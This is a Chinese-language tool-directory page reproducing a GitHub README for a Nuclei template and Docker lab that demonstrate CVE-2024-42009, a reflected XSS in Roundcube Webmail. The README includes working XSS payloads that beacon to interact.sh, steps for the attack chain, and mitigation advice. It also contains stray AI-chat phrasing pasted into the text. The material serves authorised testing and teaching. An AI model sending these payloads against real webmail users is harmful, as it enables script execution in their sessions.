Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/shubhankargupta691/cve-2024-42009
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Nuclei模板和Docker实验室,用于演示和验证CVE-2024-42009,Roundcube Webmail中的反射型XSS,使用Interactsh进行带外检测,用于授权测试。

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-42009 – Roundcube Webmail 中的反射型 XSS

📌 概述

本仓库包含一个 Nuclei 模板 及配套资源,用于安全演示和验证 CVE-2024-42009,这是 Roundcube Webmail 中一个严重的反射型 XSS 漏洞。该漏洞存在于 show.php 的 message_body() 函数中,经过净化后的修改导致去净化,进而不安全地渲染精心构造的 HTML 邮件内容。

⚠️ 此 PoC 仅供 教育和授权测试 使用。请勿将其用于您不拥有或未经明确许可的系统。


🧠 漏洞摘要

  • CVE ID: CVE-2024-42009
  • 严重性: 严重 (CVSS 9.8)
  • 受影响版本: Roundcube ≤ 1.6.7 和 ≤ 1.5.7
  • 已修复版本: 1.6.8 和 1.5.8
  • 组件: show.php 中的 message_body() 函数
  • 影响: 用户查看恶意邮件时可执行任意 JavaScript

🧪 检测策略(仅限实验室使用)

本仓库使用 带外 (OOB) 检测机制,通过 Interactsh 在受控实验室环境中确认 JavaScript 执行。

关键步骤:

  1. 部署易受攻击的 Roundcube 实例(例如通过 Docker)
  2. 发送包含 <body> 标签(带有 onanimationstart 属性)和指向 Interactsh 的信标的精心构造邮件
  3. 在 Roundcube 界面中打开该邮件
  4. 确认对 Interactsh 域名的 DNS/HTTP 回调

🐳 实验室搭建

使用提供的 Docker Compose 文件快速搭建包含 MailHog(SMTP 接收器)和 MariaDB 的本地 Roundcube 实例。

root@kitploit:~
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Roundcube 界面: http://localhost:8080
  • MailHog 界面: http://localhost:8025
  • 登录方式: Google 账户

⚠️ 请勿使用您的 Google 账户。


📁 仓库内容

  • CVE-2024-42009-OOB.yaml – 含 Interactsh 和带外 (OOB) 检测的 Nuclei 模板
  • CVE-2024-42009.yaml – 不含 Interactsh 和 OOB 的 Nuclei 模板
  • docker-compose.yml – Roundcube Webmail 的实验室环境配置
  • Images/ – 显示来自 Interactsh 的 HTTP/DNS 命中的截图

🎥 视频演示

本视频展示了完整的攻击链:

  • 构造 payload
  • 通过邮件或端点发送 payload
  • 触发漏洞
  • 通过 Interactsh 确认信标

(视频演示)


为了在 README 中负责任地包含这些 XSS payload,建议将其放在明确标注为 教育或测试目的 的章节中。以下是一个建议结构:


🧪 XSS Payload 示例(仅限测试目的)

⚠️ 免责声明:这些 payload 仅用于教育目的和授权安全测试。请勿在未经明确许可的系统上部署。

root@kitploit:~
<!-- 使用 onerror 的图片标签 -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- 使用 onerror 的损坏图片源 -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">

<!-- 使用 onload 的 SVG -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- 脚本标签 -->
<script>fetch('https://interact.sh/hit')</script>

<!-- iframe src 中的 JavaScript -->

🧭 使用方法

  • 将 https://interact.sh/hit 替换为您自己的监听器端点。
  • 在本地实验室或 CTF 平台等受控环境中使用。
  • 监控您的端点以接收传入的请求来验证执行。

🛡️ 缓解措施

升级 Roundcube 至:

  • 1.6.8 或 1.5.8
    这些版本移除了有问题的后处理逻辑,并应用了更严格的净化和 CSP 头。

📜 参考文献

完美——以下是您可以包含在 README 或针对 CVE-2024-42009 的邮件提交中的干净、专业的 参考文献 部分。它引用了您列出的所有来源,格式清晰且可信:


📚 参考文献

  • NVD CVE 条目 – CVE-2024-42009 – 官方漏洞列表,包含 CVSS 评分和受影响版本
  • SonarSource 博客 – 政府邮件面临风险 – 深入技术分析和漏洞利用详情
  • DaniTheHack3r 的 GitHub PoC – 基于 Python 的漏洞利用,包含邮件监听器和动画触发 payload
  • Bhanunamikaze 的 GitHub PoC – 通过 HTTP 监听器自动注入 payload 并窃取数据
  • 0xbassiouny1337 的 GitHub PoC – 存储型 XSS 漏洞利用,包含实时邮件捕获和解码
下载工具